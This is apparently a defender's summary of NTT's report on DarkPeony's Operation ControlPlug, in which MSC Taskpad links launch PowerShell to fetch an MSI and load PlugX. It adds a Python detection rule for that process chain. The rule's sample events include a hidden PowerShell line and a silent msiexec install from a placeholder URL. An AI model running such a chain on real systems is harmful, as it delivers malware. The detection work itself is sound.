Operation ControlPlug: APT Attack Campaign abusing MSC file

2024-06-13 NTTSecurity

https://jp.security.ntt/tech_blog/controlplug-en

NTT notes that Kimsuky abuse of MSC files had been reported since April 2024, placing Microsoft Common Console documents among techniques already adopted by multiple APT groups. The detailed case in the excerpt is DarkPeony’s Operation ControlPlug rather than a Kimsuky intrusion, but it shows how an MSC Console Taskpad link can launch PowerShell when a user clicks a disguised interface element. In that chain, PowerShell downloads an MSI package, a legitimate EXE performs DLL side-loading, a DAT file is decoded, and PlugX is launched. The campaign’s MSI delivery sites sometimes used Cloudflare restrictions, which NTT assesses may have been intended to block researchers or automated analysis while still allowing target access. For DPRK-focused tracking, the supported finding is limited to Kimsuky’s reported use of MSC files, with the DarkPeony chain providing context on why MSC abuse is operationally significant.
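The mmc.exe → powershell.exe → msiexec.exe sequence described above is the observable a defender can hunt for. The following is an added detection example, not code from the NTT report; it runs over constructed Sysmon-style process-creation events (hostnames, paths, the .msc file name and the URL are placeholders, not indicators from the campaign) and escalates an mmc.exe-spawns-PowerShell hit when that PowerShell goes on to launch msiexec.exe against a remote MSI within a short window.

```python
from datetime import datetime, timedelta

# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified).
# Host names, paths, the .msc name and the URL are placeholders, not report IoCs.
SAMPLE_EVENTS = [
    {"ts": "2024-06-05T09:00:00", "host": "ws01", "pid": 410, "ppid": 120,
     "image": r"C:\Windows\System32\mmc.exe",
     "cmdline": r'"C:\Windows\System32\mmc.exe" C:\Users\u\Downloads\notice.msc'},
    {"ts": "2024-06-05T09:00:07", "host": "ws01", "pid": 522, "ppid": 410,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c <redacted>"},
    {"ts": "2024-06-05T09:00:12", "host": "ws01", "pid": 600, "ppid": 522,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i https://example.invalid/update.msi /qn"},
    # Benign: an admin opens services.msc, later starts PowerShell from Explorer.
    {"ts": "2024-06-05T10:00:00", "host": "ws02", "pid": 700, "ppid": 120,
     "image": r"C:\Windows\System32\mmc.exe",
     "cmdline": r'"C:\Windows\System32\mmc.exe" C:\Windows\System32\services.msc'},
    {"ts": "2024-06-05T10:05:00", "host": "ws02", "pid": 710, "ppid": 120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
]

WINDOW = timedelta(seconds=120)  # max gap between PowerShell start and msiexec child

def _name(ev):
    # Windows path, so split on backslash rather than relying on os.path.
    return ev["image"].rsplit("\\", 1)[-1].lower()

def detect_msc_chain(events):
    """Flag powershell.exe whose parent is mmc.exe (an MSC Taskpad launch);
    escalate when that PowerShell spawns msiexec.exe with a URL within WINDOW."""
    by_key = {(e["host"], e["pid"]): e for e in events}
    findings = []
    for ev in events:
        if _name(ev) != "powershell.exe":
            continue
        parent = by_key.get((ev["host"], ev["ppid"]))
        if parent is None or _name(parent) != "mmc.exe":
            continue
        finding = {"host": ev["host"], "rule": "mmc_spawns_powershell",
                   "msc": parent["cmdline"].rsplit(" ", 1)[-1]}  # console file opened
        t0 = datetime.fromisoformat(ev["ts"])
        for child in events:
            if (child["host"], child["ppid"]) != (ev["host"], ev["pid"]):
                continue
            gap = datetime.fromisoformat(child["ts"]) - t0
            if (_name(child) == "msiexec.exe" and "http" in child["cmdline"].lower()
                    and timedelta(0) <= gap <= WINDOW):
                finding["rule"] = "msc_powershell_remote_msi_chain"
        findings.append(finding)
    return findings
```

The benign ws02 events produce no finding because the PowerShell there is not a child of mmc.exe; a real deployment would key the same logic off parent process and command line fields from the endpoint telemetry in use.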

Indicators of Compromise
